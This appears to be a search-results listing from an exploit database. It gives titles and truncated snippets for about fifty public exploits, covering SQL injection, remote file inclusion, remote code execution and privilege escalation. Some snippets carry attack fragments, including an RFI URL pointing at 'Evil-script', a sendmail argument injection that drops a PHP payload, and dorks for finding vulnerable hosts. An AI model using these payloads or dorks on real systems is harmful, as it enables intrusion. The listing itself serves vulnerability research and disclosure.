41207 matches found
Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion
Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/6920/Simpleboard-1.1.0-Stable.zip bug found in file fileupload.php :...
Apache CouchDB 2.1.0 - Remote Code Execution
Apache CouchDB 2.1.0 - Remote Code Execution Title: Apache CouchDB 2.1.0 - Remote Code Execution Author: Cody Zacharias Shodan Dork: port:5984 Vendor Homepage: http://couchdb.apache.org/ Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ Version: = 1.7.0 and 2.x - 2.1.0 Tested on...
Zeta Components Mail 1.8.1 - Remote Code Execution
Zeta Components Mail 1.8.1 - Remote Code Execution Vendor: Zeta Components module: Mail, returnPath-email”; If attacker assign email address like: '[email protected] -X/var/www/html/cache/exploit.php' and inject payload in mail body, sendmail will transfer log-X into...
ProficySCADA for iOS 5.0.25920 - Password Denial of Service (PoC)
ProficySCADA for iOS 5.0.25920 - Password Denial of Service PoC Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service PoC Author: Ivan Marmolejo Date: 2020-03-22 Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 Software Link: App Store for iOS devices...
Modern POS 1.3 - SQL Injection
Modern POS 1.3 - SQL Injection Exploit Title: Modern POS 1.3 - SQL Injection Dork: N/A Date: 2019-01-13 Exploit Author: Ihsan Sencan Vendor Homepage: http://itsolution24.com/ Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683 Version: 1.3...
Pasworld - detail.php Blind SQL Injection
Pasworld - detail.php Blind SQL Injection ========================================================= + Title :- Pasworld detail.php Blind Sql Injection Vulnerability + Date :- 5 - June - 2015 + Vendor Homepage: :- http://main.pasworld.co.th/ + Version :- All Versions + Tested on :- Nginx/1.4.5,...
ashNews 0.83 - pathtoashnews Remote File Inclusion
ashNews 0.83 - pathtoashnews Remote File Inclusion DEVIL TEAM THE BEST POLISH TEAM ashnews v0.83pathtoashnews - Remote File Include Vulnerabilities Script site: http://dev.ashwebstudio.com/ dork: News powered by ashnews Find by Kacper Rahim. Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam...
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service Exploit Title: Exim ESMTP GHOST DoS PoC Exploit Date: 1/29/2015 Exploit Author: 1N3 Vendor Homepage: www.exim.org Version: 4.80 or less Tested on: debian-7-7-64b CVE : 2015-0235 !/usr/bin/python Exim ESMTP DoS Exploit by 1N3 v20150128...
radnics gold 5.0 - Multiple Vulnerabilities
radnics gold 5.0 - Multiple Vulnerabilities -----------------------------I AM MUSLIM !!------------------------------ ============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ ||...
Link ADS 1 - linkid SQL Injection
Link ADS 1 - linkid SQL Injection Link ADS 1 SQL Injection Vulnerability ======================================================== Author: Hussin X Home : www.tryag.cc/cc email: darkangelg85atYahooDoTcom hussin.xathotmailDoTcom ======================================================== HomE script :...
YABB SE 0.81.41.5 - Packages.php Remote File Inclusion
YABB SE 0.81.41.5 - Packages.php Remote File Inclusion source: https://www.securityfocus.com/bid/6663/info YaBB SE allows remote users to influence the location of included files. A remote attacker may exploit this condition to cause an external, attacker-supplied file to be included and executed...
Lua 5.3.5 - debug.upvaluejoin Use After Free
Lua 5.3.5 - debug.upvaluejoin Use After Free Exploit Title: Lua 5.3.5 Exploit Author: Fady Mohamed Osman https://twitter.com/fadyothman Exploit-db : http://www.exploit-db.com/author/?a=2986 Blog : https://blog.fadyothman.com/ Date: Jan. 10th 2019 Vendor Homepage: https://www.lua.org/ Software Lin...
Google Chrome 70 - SQLite Magellan Crash (PoC)
Google Chrome 70 - SQLite Magellan Crash PoC This proof-of-concept crashes the Chrome renderer process using Tencent Blade Team's Magellan SQLite3 bug. It's based on a SQLite test case from the commit that fixed the bug. If you're using Chrome 70 or below, tap the button below to crash this page:...
Advanced Comment System 1.0 - SQL Injection
Advanced Comment System 1.0 - SQL Injection Exploit Title: SQL injection in Advanced comment system v1.0 Date: 29-10-2018 Exploit Author: Rafael Pedrero Vendor Homepage: http://www.plohni.com Software Link: http://www.plohni.com/wb/content/php/download/Advancedcommentsystem1-0.zip,...
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML...
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (2) (DTLS Support)
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak 2 DTLS Support / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leake...
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)
OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak 1 / CVE-2014-0160 heartbleed OpenSSL information leak exploit ========================================================= This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information...
Sysaid 20.1.11 b26 - Remote Command Execution
Sysaid 20.1.11 b26 - Remote Command Execution Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution Google Dork: intext:"Help Desk Software by SysAid " Date: 2020-03-09 Exploit Author: Ahmed Sherif Vendor Homepage: https://www.sysaid.com/free-help-desk-software Software Link:...
OpenSMTPD 6.4.0 6.6.1 - Local Privilege Escalation + Remote Code Execution
OpenSMTPD 6.4.0 6.6.1 - Local Privilege Escalation + Remote Code Execution Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation Date: 2020-02-02 Exploit Author: Marco Ivaldi Vendor Homepage: https://www.opensmtpd.org/ Version: OpenSMTPD 6.4.0 - 6.6.1 Tested on: OpenBSD 6.6, Debian GNU/Linu...
Linux Kernel 4.4.0-21 4.4.0-51 (Ubuntu 14.0416.04 x86-64) - AF_PACKET Race Condition Privilege Escalation
Linux Kernel 4.4.0-21 4.4.0-51 Ubuntu 14.0416.04 x86-64 - AFPACKET Race Condition Privilege Escalation / chocoboroot.c linux AFPACKET race condition exploit for CVE-2016-8655. Includes KASLR and SMEP/SMAP bypasses. For Ubuntu 14.04 / 16.04 x8664 kernels 4.4.0 before 4.4.0-53.74. All kernel offset...
ElasticSearch - Remote Code Execution
ElasticSearch - Remote Code Execution body padding-top: 50px; .starter-template padding: 40px 15px; text-align: center; function esinject var readfile; var writefile; readfile = functionfilename return "import java.util.;\nimport java.io.;\nnew Scannernew File"" + filename +...
Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation
Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation I have previously disclosed a couple of bugs in Hashicorp's vagrant-vmware-fusion plugin for vagrant. Unfortunately the 4.0.23 release which was supposed to fix the previous bug I reported didn't address the issue, so Hashicorp...
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 1 Exploit Title: HttpFileServer 2.3.x Remote Command Execution Google Dork: intext:"httpfileserver 2.3" Date: 11-09-2014 Remote: Yes Exploit Author: Daniele Linguaglossa Vendor Homepage: http://rejetto.com/ Software Link:...
Nginx 0.6.36 - Directory Traversal
Nginx 0.6.36 - Directory Traversal Exploit Title: nginx engine x http server = 0.6.36 Path Draversal Date: 20/05/10 Author: cp77fk4r | empty0pageSHIFT+2gmail.com | www.DigitalWhisper.co.il Software Link: http://nginx.org/ Version: = 0.6.36 Tested on: Win32 Path Traversal: A Path Traversal attack...
PHPhotoalbum - Arbitrary File Upload
PHPhotoalbum - Arbitrary File Upload || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ team wlhaan hacker | | // | | |...
Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.exagate.com/ Software Link: https://www.exagate.com/sysguard-6001 Version: SYSGuard 6001 HTML...
Joomla! 1.5 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution
Joomla! 1.5 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution !/usr/bin/env python Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header Date: 12/17/2015 Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs @0xcclabs...
Oracle Document Capture - empop3.dll Insecure Methods
Oracle Document Capture - empop3.dll Insecure Methods Source: http://packetstormsecurity.org/files/view/97868/DSECRG-11-005.txt ActiveX components contain insecure methods. Digital Security Research Group DSecRG Advisory DSECRG-11-005 internal DSECRG-00154 Application: Oracle Document Capture...
Open Realty 2.x3.x - Persistent Cross-Site Scripting
Open Realty 2.x3.x - Persistent Cross-Site Scripting Title: persistence XSS flaw in Open Realty 2.x and 3.x Author: K053 Date: 2010-7-24 Hompage: http://open-realty.org Download Link: http://www.open-realty.org/download.html Version: 3.x & 2.x...
SpyHunter 4 - SpyHunter 4 Service Unquoted Service Path
SpyHunter 4 - SpyHunter 4 Service Unquoted Service Path Exploit Title: SpyHunter 4 - 'SpyHunter 4 Service' Unquoted Service Path Discovery by: Alejandro Reyes Discovery Date: 2020-03-05 Vendor Homepage: https://www.enigmasoftware.com Software Link :...
Microsoft Windows - .LNK Shortcut File Code Execution (Metasploit)
Microsoft Windows - .LNK Shortcut File Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LNK Remote Code Execution Vulnerability', 'Description' = %q This module exploits...
Linux Kernel (Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation
Linux Kernel Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511 - ldsohwcap Stack Clash Local Privilege Escalation / Linuxldsohwcap.c for CVE-2017-1000366, CVE-2017-1000370 Copyright C 2017 Qualys, Inc. myimportanthwcaps adapted from elf/dl-hwcaps.c, part of the GNU C Library: Copyright C...
Simple-HTTPD
Remote root on sfr/ubiquisys femtocell webserver wsal/shttpd/mongoose ToDo: Add execute shell ToDo: Test vulnerable targets Modified by JSacco - [email protected] part of femtocell research by TU-Berlin only for educational purposes Exploit Title: remote root on sfr/ubiquisys femtocell...
WebDM CMS - SQL Injection
WebDM CMS - SQL Injection WebDM CMS SQL Injection Vulnerability EDB-ID: CVE: OSVDB-ID: Author: Dr.0rYX and Cr3w-DZ Published: Verified: Exploit Code: Vulnerable App: . . \ \ /| | \ /|| / / /\ \ | | | | \ \ \ | \ \ |/ \ \ | | \ / \ | /| | | Y \ // / | \ | | / \ \ / \ || /\ /| || || / /\ / ||...
Apache Tomcat 5.5.0 5.5.29 6.0.0 6.0.26 - Information Disclosure
Apache Tomcat 5.5.0 5.5.29 6.0.0 6.0.26 - Information Disclosure CVE-2010-1157: Apache Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 6.0.0 to 6.0.26 - - Tomcat 5.5.0 to 5.5.29 Note: The unsupported Tomcat 3.x, 4.x an...
DUware DUpaypal 3.03.1 - detail.asp?iPro SQL Injection
DUware DUpaypal 3.03.1 - detail.asp?iPro SQL Injection source: https://www.securityfocus.com/bid/14034/info DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fails application to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...
RICOH Aficio SP 5200S Printer - entryNameIn HTML Injection
RICOH Aficio SP 5200S Printer - entryNameIn HTML Injection Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection Discovery by: Paulina Girón Discovery Date: 2020-03-02 Vendor Homepage: https://www.ricoh.com/ Hardware Link:...
OpenSMTPD 6.6.3p1 - Local Privilege Escalation + Remote Code Execution
OpenSMTPD 6.6.3p1 - Local Privilege Escalation + Remote Code Execution / LPE and RCE in OpenSMTPD's default install CVE-2020-8794 Copyright C 2020 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by...
McAfee Virus Scan Enterprise for Linux 1.9.2 2.0.2 - Remote Code Execution
McAfee Virus Scan Enterprise for Linux 1.9.2 2.0.2 - Remote Code Execution ''' Source: https://nation.state.actor/mcafee.html Vulnerabilities CVE-2016-8016: Remote Unauthenticated File Existence Test CVE-2016-8017: Remote Unauthenticated File Read with Constraints CVE-2016-8018: No Cross-Site...
mcart.xls Bitrix Module 6.5.2 - SQL Injection
mcart.xls Bitrix Module 6.5.2 - SQL Injection Advisory ID: HTB23279 Product: mcart.xls Bitrix module Vendor: www.mcart.ru Vulnerable Versions: 6.5.2 and probably prior Tested Version: 6.5.2 Advisory Publication: November 18, 2015 without technical details Vendor Notification: November 18, 2015...
PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload
PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload date"U"-300 43. 44. fnc"laneMakeToken", "file", $GET"id", array 45. "user.username" = me"username", 46. "file" = "system/cache/temp/".$filename, 47. ; 48. PHPizabi is prone to a vulnerability that lets remote attackers to upload and execute...
AtomixMP3 2.3 - .m3u Local Buffer Overflow
AtomixMP3 2.3 - .m3u Local Buffer Overflow / ======================================================================== 0-day AtomixMP3 November 2006 - Month Of Greg's Media Player Exploits : i'll probably continue it into December Discovered and Reported By: Greg Linares [email protected]...
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Author: RedTeam Pentesting GmbH Date: 2020-03-11 Vendor: https://www.watchguard.com Software link:...
Microsoft Windows - Win32k Local Privilege Escalation
Microsoft Windows - Win32k Local Privilege Escalation CVE-2019-0803 Win32k Elevation of Privilege Poc Reference ----------------------------- steal Security token https://github.com/mwrlabs/CVE-2016-7255 EDB Note: Download...
Microsoft Internet Explorer 11 - Js::RegexHelper::RegexReplace Use-After-Free
Microsoft Internet Explorer 11 - Js::RegexHelper::RegexReplace Use-After-Free var vars = new Array2; function main vars0 = Array1000000.joinString.fromCharCode0x41; vars1 = String.prototype.substring.callvars0, 1, vars0.length; String.prototype.replace.callvars1, RegExp, f; function farg1, arg2,...
PHPRaid 3.0.7 - rss.php?PHPraid_dir Remote File Inclusion
PHPRaid 3.0.7 - rss.php?PHPraiddir Remote File Inclusion !/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// ||...
Pivot 1.0 - module_db.php Remote File Inclusion
Pivot 1.0 - moduledb.php Remote File Inclusion source: https://www.securityfocus.com/bid/10553/info It has been reported that Pivot is affected by a remote file include vulnerability contained within the moduledb.php script. This issue is due to a failure of the application to properly sanitize...
60CycleCMS - news.php SQL Injection
60CycleCMS - news.php SQL Injection Exploit Title: 60CycleCMS - 'news.php' Multiple vulnerability Google Dork: N/A Date: 2020-02-10 Exploit Author: Unkn0wn Vendor Homepage: http://davidvg.com/ Software Link: https://www.opensourcecms.com/60cyclecms Version: 2.5.2 Tested on: Ubuntu CVE : N/A...
ASUS GiftBox Desktop 1.1.1.127 - ASUSGiftBoxDesktop Unquoted Service Path
ASUS GiftBox Desktop 1.1.1.127 - ASUSGiftBoxDesktop Unquoted Service Path Exploit Title: ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path Discovery by: Oscar Flores Discovery Date: 2020-03-05 Vendor Homepage: https://www.asus.com/ Software Link :...
Cisco Data Center Network Manager 11.2.1 - LanFabricImpl Command Injection
Cisco Data Center Network Manager 11.2.1 - LanFabricImpl Command Injection !/usr/bin/python """ Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal...